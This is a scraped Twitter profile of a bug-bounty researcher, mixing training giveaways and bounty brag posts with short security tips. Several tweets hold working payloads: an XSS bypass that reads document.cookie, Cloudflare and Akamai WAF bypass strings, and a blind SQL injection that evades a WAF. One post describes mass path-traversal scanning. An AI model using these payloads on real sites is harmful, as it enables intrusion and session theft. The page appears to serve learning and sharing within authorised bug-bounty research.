Amit Kumar🇮🇳 (@amitlt2) 's Twitter Profile
Amit Kumar🇮🇳

@amitlt2

Microsoft Q1 Top Researcher 2022 & Secured 100+ Applications | Web, API and Android Pentester | Security Analyst | Philophobia Guy |

ID: 1284258564484108288

linkhttps://amit-lt.medium.com calendar_today17-07-2020 22:48:12

297 Tweet

437 Takipçi

372 Takip Edilen

Ben Sadeghipour (@nahamsec) 's Twitter Profile Photo

🎯 Black Friday Special+ Giveaway: Get the full course for just $29 (reg. $119) at with code 'FRIDAY2024'! hhub.io/BlackFriday Includes: 15+ Hours of content + 100+ labs! 🎁 BONUS: reply & retweet - one lucky winner gets 2 FREE course coupons (keep one, gift one)!

🎯 Black Friday Special+ Giveaway: 

Get the full course for just $29 (reg. $119) at with code 'FRIDAY2024'! hhub.io/BlackFriday 

Includes: 15+ Hours of content + 100+ labs!

🎁 BONUS: reply & retweet - one lucky winner gets 2 FREE course coupons (keep one, gift one)!
Project Sekai CTF (@projectsekaictf) 's Twitter Profile Photo

🎁 End of Year Giveaway 🎁 Hack The Box 6-month VIP+ x1 - Follow, Like, and Retweet to join! - Winner will be picked randomly on December. #hackthebox #giveaway #projectsekaictf

🎁 End of Year Giveaway 🎁 

Hack The Box 6-month VIP+ x1
- Follow, Like, and Retweet to join!
- Winner will be picked randomly on December.

#hackthebox #giveaway #projectsekaictf
Jason Haddix (@jhaddix) 's Twitter Profile Photo

🛑 GIVEAWAY ALERT 🛑 Today is DAY TWO of FIVE DAYS of Arcanum Information Security and friends Black Friday and Cyber Monday giveaways! Today we are giving away FIVE seats to our flagship training: "The Bug Hunter's Methodology Live" TBHM is one of the BEST trainings in the industry for

🛑 GIVEAWAY ALERT 🛑

Today is DAY TWO of FIVE DAYS of <a href="/arcanuminfosec/">Arcanum Information Security</a>  and friends Black Friday and Cyber Monday giveaways!

Today we are giving away FIVE seats to our flagship training:

"The Bug Hunter's Methodology Live" 

TBHM is one of the BEST trainings in the industry for
Ahsan Khan (@hunter0x7) 's Twitter Profile Photo

Update no 7: Reported 50 submissions (total). 1. XSS Bypass: <form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(document.cookie)><style>:target {color:red;}</style> 2. Another XSS Bypass: =>

Ben Sadeghipour (@nahamsec) 's Twitter Profile Photo

Final giveaway of the year🎁: 4️⃣Hand-On Web Exploitation (Course Only hhub.io/2024holidays) 3️⃣Shodan Codes 2️⃣Caido licenses 1️⃣Hands-On Web Exploitation (Certificate+Course Bundle) To enter drop a 🫶🏼and RT

Final giveaway of the year🎁: 
4️⃣Hand-On Web Exploitation (Course Only  hhub.io/2024holidays)
3️⃣Shodan Codes
2️⃣Caido licenses 
1️⃣Hands-On Web Exploitation (Certificate+Course Bundle)

To enter drop a 🫶🏼and RT
Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

Bypass Cloudflare WAF (DOM-based XSS) ♻️ Payload: '-alert?.(1)-' writeup: 1337.or.id/post/stored-do… #infosec #cybersec #bugbountytips

Bypass Cloudflare WAF (DOM-based XSS) ♻️

Payload:
'-alert?.(1)-' 

writeup: 1337.or.id/post/stored-do…

#infosec #cybersec #bugbountytips
Amit Kumar🇮🇳 (@amitlt2) 's Twitter Profile Photo

Proud to be recognized by NASA for my security research contributions! It's an honor to help safeguard critical systems and support the mission of space exploration. Grateful for this acknowledgment! 🚀🔒 #NASA #CyberSecurity #BugBounty #Bugcrowd #EthicalHacking

Proud to be recognized by NASA for my security research contributions! It's an honor to help safeguard critical systems and support the mission of space exploration. Grateful for this acknowledgment! 🚀🔒 #NASA #CyberSecurity #BugBounty #Bugcrowd #EthicalHacking
Amit Kumar🇮🇳 (@amitlt2) 's Twitter Profile Photo

Just received swag from Sony via HackerOne for a valid vulnerability report! Another step forward in my #BugBounty journey. Stay consistent, stay curious! #InfoSec #BugBountyHunter #CyberSecurity #HackerOne #ResponsibleDisclosure #EthicalHacking #RedTeam #AppSec #BugBountyWin

Just received swag from <a href="/Sony/">Sony</a> via <a href="/Hacker0x01/">HackerOne</a> for a valid vulnerability report! Another step forward in my #BugBounty journey. Stay consistent, stay curious!
#InfoSec #BugBountyHunter #CyberSecurity #HackerOne #ResponsibleDisclosure #EthicalHacking #RedTeam #AppSec #BugBountyWin
N$ (@nav1n0x) 's Twitter Profile Photo

Simple LFI using my path traversal script on GitHub. Used Devansh (⚡, 🥷)’s ParamSpider to gather URLs, filtered for relevant parameters, slightly modified the script to inject payloads into parameters like ?path and ?file, & ran the script — got 1 hit out of 20k+ URLs. The target is

Simple LFI using my path traversal script on GitHub. Used <a href="/0xAsm0d3us/">Devansh (⚡, 🥷)</a>’s ParamSpider to gather URLs, filtered for relevant parameters, slightly modified the script to inject payloads into parameters like ?path and ?file, &amp; ran the script — got 1 hit out of 20k+ URLs. The target is
VIEH Group (@viehgroup) 's Twitter Profile Photo

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

Cloudflare 403 bypass to time-based blind SQLi:
PL: (select(0)from(select(sleep(10)))v) → 403
but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi  
#BugBounty #SQLi
VIEH Group (@viehgroup) 's Twitter Profile Photo

CVE-2025-4123 : A Cross-Site Scripting (XSS) Vulnerability Exists in Grafana Github Code: github.com/NightBloodz/CV… #infosec #hacking #Hacker #cybersecurity #bugbounty #bugbountytips #xss

CVE-2025-4123 : A Cross-Site Scripting (XSS) Vulnerability Exists in Grafana

Github Code: github.com/NightBloodz/CV… 

#infosec #hacking #Hacker #cybersecurity #bugbounty #bugbountytips #xss
Amit Kumar🇮🇳 (@amitlt2) 's Twitter Profile Photo

3 Akamai WAF Bypass 'a'.replace.call`1${/./}${alert}` 'a,'.replace`a${alert}` 'a'.replace(/./,alert) #akamai #bugbounty #bughunting #infosec #security #ethicalhacking

VIEH Group (@viehgroup) 's Twitter Profile Photo

CVE-2025-55315 - ASP.NET Kestrel HTTP Request and Response Smuggling Another automated reproduction from #pruva - this time plus a bonus point: A Detection! gist.github.com/N3mes1s/d0897c… Thanks turb0 #BugBounty #EthicalHacking #CyberSecurity

VIEH Group (@viehgroup) 's Twitter Profile Photo

🚨 CVE-2025-55315 (CVSS 9.9) – Critical HTTP Request Smuggling in ASP. NET Kestrel Our Cyber Security Engineer Amit Kumar🇮🇳 discovered & added a severe chunked encoding bypass leading to smuggling to ProjectDiscovery zurl.co/PHSTP #infosec #bugbountytips #bugbounty